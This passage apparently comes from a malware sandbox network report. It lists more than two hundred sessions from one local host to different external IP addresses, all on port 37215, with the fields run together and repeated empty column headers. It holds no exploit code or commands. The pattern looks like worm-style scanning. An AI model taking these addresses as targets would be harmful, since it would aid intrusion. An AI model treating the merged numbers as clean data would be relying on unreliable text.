                                              24287192.168.2.1538856121.233.188.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24288192.168.2.154183837.146.194.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24289192.168.2.153891641.112.27.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24290192.168.2.1551916121.129.197.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24291192.168.2.156018094.4.32.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24292192.168.2.154279031.179.23.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24293192.168.2.1543514156.248.162.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24294192.168.2.1554564157.88.241.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24295192.168.2.154724494.19.232.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24296192.168.2.155047494.154.148.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24297192.168.2.1547522156.199.119.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24298192.168.2.156011037.187.115.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24299192.168.2.154358294.137.102.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24300192.168.2.1537374156.136.134.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24301192.168.2.1550372190.225.173.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24302192.168.2.1554052181.66.214.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24303192.168.2.1548702222.117.178.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24304192.168.2.155395041.126.247.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24305192.168.2.153787439.3.103.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24306192.168.2.1555722157.205.49.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24307192.168.2.1559988156.94.170.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24308192.168.2.1553624156.13.186.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24309192.168.2.1559836138.70.74.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24310192.168.2.153725018.156.92.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24311192.168.2.1540812157.217.110.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24312192.168.2.1534720157.235.2.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24313192.168.2.1542662121.164.114.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24314192.168.2.1545846102.23.12.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24315192.168.2.1542688156.35.88.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24316192.168.2.154067445.44.239.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24317192.168.2.154655231.127.15.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24318192.168.2.154616037.152.249.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24319192.168.2.1544788102.168.43.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24320192.168.2.1544134138.37.99.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24321192.168.2.1550892186.80.242.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24322192.168.2.1541518157.18.62.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24323192.168.2.1552760102.30.146.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24324192.168.2.1552782222.1.124.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24325192.168.2.155055645.91.231.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24326192.168.2.155952294.125.47.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24327192.168.2.1549616122.6.34.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24328192.168.2.1550422177.238.97.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24329192.168.2.155084031.179.204.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24330192.168.2.154899637.180.183.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24331192.168.2.154647437.35.36.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24332192.168.2.1552996138.109.13.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24333192.168.2.155447441.198.150.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24334192.168.2.1546272222.43.43.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24335192.168.2.155540645.245.209.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24336192.168.2.153580431.228.66.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24337192.168.2.1555330197.182.228.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24338192.168.2.1549138156.18.206.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24339192.168.2.1542858157.84.57.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24340192.168.2.1548974190.146.162.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24341192.168.2.1542246156.137.64.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24342192.168.2.1533326121.73.213.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24343192.168.2.1544564197.200.32.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24344192.168.2.1557702122.84.200.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24345192.168.2.1555056181.145.81.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24346192.168.2.154393694.215.125.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24347192.168.2.154607494.81.237.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24348192.168.2.153460894.42.152.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24349192.168.2.153655837.86.221.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24350192.168.2.1559060102.251.132.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24351192.168.2.1537172121.245.43.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24352192.168.2.1558518222.228.121.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24353192.168.2.1559260122.129.200.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24354192.168.2.1544110122.242.179.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24355192.168.2.155606494.138.46.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24356192.168.2.1543638121.255.150.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24357192.168.2.155114831.170.138.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24358192.168.2.155690241.249.32.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24359192.168.2.154336045.134.189.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24360192.168.2.1560732197.233.158.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24361192.168.2.1532970116.147.68.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24362192.168.2.1555540190.124.83.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24363192.168.2.1542850122.196.52.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24364192.168.2.1560084121.187.150.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24365192.168.2.1540686222.146.31.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24366192.168.2.1550708138.103.143.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24367192.168.2.1556692102.100.131.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24368192.168.2.1546256102.17.9.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24369192.168.2.1553448157.119.248.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24370192.168.2.155903499.37.252.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24371192.168.2.153508294.220.78.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24372192.168.2.1546730157.156.51.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24373192.168.2.153474841.22.85.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24374192.168.2.1535854190.234.3.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24375192.168.2.153307231.59.73.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24376192.168.2.155545041.51.47.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24377192.168.2.1548644190.110.39.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24378192.168.2.1553018157.101.207.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24379192.168.2.1552660186.113.96.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24380192.168.2.1538094181.50.11.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24381192.168.2.1550456138.192.133.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24382192.168.2.1540546156.33.15.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24383192.168.2.154799437.208.9.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24384192.168.2.1539838121.96.138.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24385192.168.2.1557698102.107.136.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24386192.168.2.1541804222.110.12.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24387192.168.2.156033237.185.205.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24388192.168.2.1546158197.81.182.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24389192.168.2.1558756197.89.118.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24390192.168.2.153766445.55.104.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24391192.168.2.1554298157.249.30.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24392192.168.2.155731894.29.24.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24393192.168.2.155048294.200.118.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24394192.168.2.154723445.245.142.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24395192.168.2.1552262197.235.109.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24396192.168.2.1539608156.26.132.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24397192.168.2.1556418197.89.241.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24398192.168.2.1534202116.75.8.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24399192.168.2.155064437.45.72.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24400192.168.2.154652631.232.67.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24401192.168.2.1542584190.10.137.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24402192.168.2.1559370138.181.2.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24403192.168.2.1549628190.224.102.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24404192.168.2.154339893.98.107.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24405192.168.2.155840431.248.120.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24406192.168.2.153326294.102.38.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24407192.168.2.1533280197.24.19.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24408192.168.2.1548308186.204.89.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24409192.168.2.1555058186.212.215.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24410192.168.2.155651231.139.131.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24411192.168.2.1546156157.228.120.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24412192.168.2.155268894.232.137.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24413192.168.2.1534118122.115.112.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24414192.168.2.155655231.213.218.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24415192.168.2.1554434197.255.169.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24416192.168.2.1548734190.43.73.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24417192.168.2.153743494.2.215.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24418192.168.2.1544982190.68.158.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24419192.168.2.1559504157.163.16.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24420192.168.2.155712445.8.95.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24421192.168.2.1556778156.191.181.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24422192.168.2.1542768181.62.44.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24423192.168.2.1538090186.240.107.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24424192.168.2.1556412181.177.79.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24425192.168.2.1558212222.126.202.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24426192.168.2.1535056156.31.160.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24427192.168.2.1534276138.161.82.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24428192.168.2.1558308181.119.62.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24429192.168.2.1554848181.108.183.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24430192.168.2.1548780188.141.6.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24431192.168.2.1542468190.23.253.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24432192.168.2.1552978157.197.97.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24433192.168.2.155002031.39.141.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24434192.168.2.1560684138.139.17.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24435192.168.2.153727294.22.121.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24436192.168.2.153669245.255.40.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24437192.168.2.1544422138.68.131.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24438192.168.2.1541526156.95.158.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24439192.168.2.1546110122.42.172.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24440192.168.2.1557466222.166.80.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24441192.168.2.1545508122.31.124.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24442192.168.2.154580631.210.0.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24443192.168.2.1550386156.142.148.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24444192.168.2.1544144186.132.162.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24445192.168.2.1534320138.143.204.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24446192.168.2.1550770138.191.51.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24447192.168.2.1534798138.155.205.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24448192.168.2.153349641.231.69.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24449192.168.2.154074031.222.216.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24450192.168.2.153830045.101.248.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24451192.168.2.1539952107.112.106.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24452192.168.2.153562894.251.223.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24453192.168.2.154860631.62.62.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24454192.168.2.1546594157.95.132.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24455192.168.2.153280441.13.103.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24456192.168.2.1532894157.13.168.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24457192.168.2.155815645.195.141.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24458192.168.2.1544498190.250.220.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24459192.168.2.1543970159.107.22.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24460192.168.2.1543260102.86.212.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24461192.168.2.1554388123.54.12.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24462192.168.2.1533412122.63.119.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24463192.168.2.1548966186.29.76.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24464192.168.2.154017641.90.163.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24465192.168.2.155451494.245.99.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24466192.168.2.1538954157.69.132.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24467192.168.2.1547510181.151.97.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24468192.168.2.153709445.118.247.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24469192.168.2.154007645.105.126.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24470192.168.2.154277831.104.192.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24471192.168.2.1545542157.7.250.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24472192.168.2.1547446222.127.82.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24473192.168.2.1539760157.239.162.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24474192.168.2.1542590197.96.36.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24475192.168.2.153324686.252.39.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24476192.168.2.153459037.54.122.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24477192.168.2.1560000181.120.1.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24478192.168.2.1545108222.165.45.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24479192.168.2.1534464102.68.191.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24480192.168.2.1547428197.46.26.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24481192.168.2.1547666181.222.127.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24482192.168.2.154880668.185.73.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24483192.168.2.1544004197.179.90.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24484192.168.2.1539402104.216.7.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24485192.168.2.1533820121.151.109.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24486192.168.2.1548344186.250.179.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24487192.168.2.1554254138.171.163.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24488192.168.2.1554436121.54.158.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24489192.168.2.1535276197.189.96.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24490192.168.2.1538164186.116.153.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24491192.168.2.153662245.227.239.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24492192.168.2.154464894.161.9.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24493192.168.2.155887894.127.117.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24494192.168.2.1537132190.30.255.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24495192.168.2.153614445.242.47.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24496192.168.2.1537518157.213.20.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24497192.168.2.154977094.122.9.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24498192.168.2.1552550122.224.190.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24499192.168.2.154938641.184.250.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24500192.168.2.155212841.64.208.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24501192.168.2.1540920121.88.2.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24502192.168.2.1554786157.2.142.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24503192.168.2.1535588121.131.43.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24504192.168.2.155522245.46.220.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24505192.168.2.154649618.71.88.1837215
                                              TimestampBytes transferredDirectionData


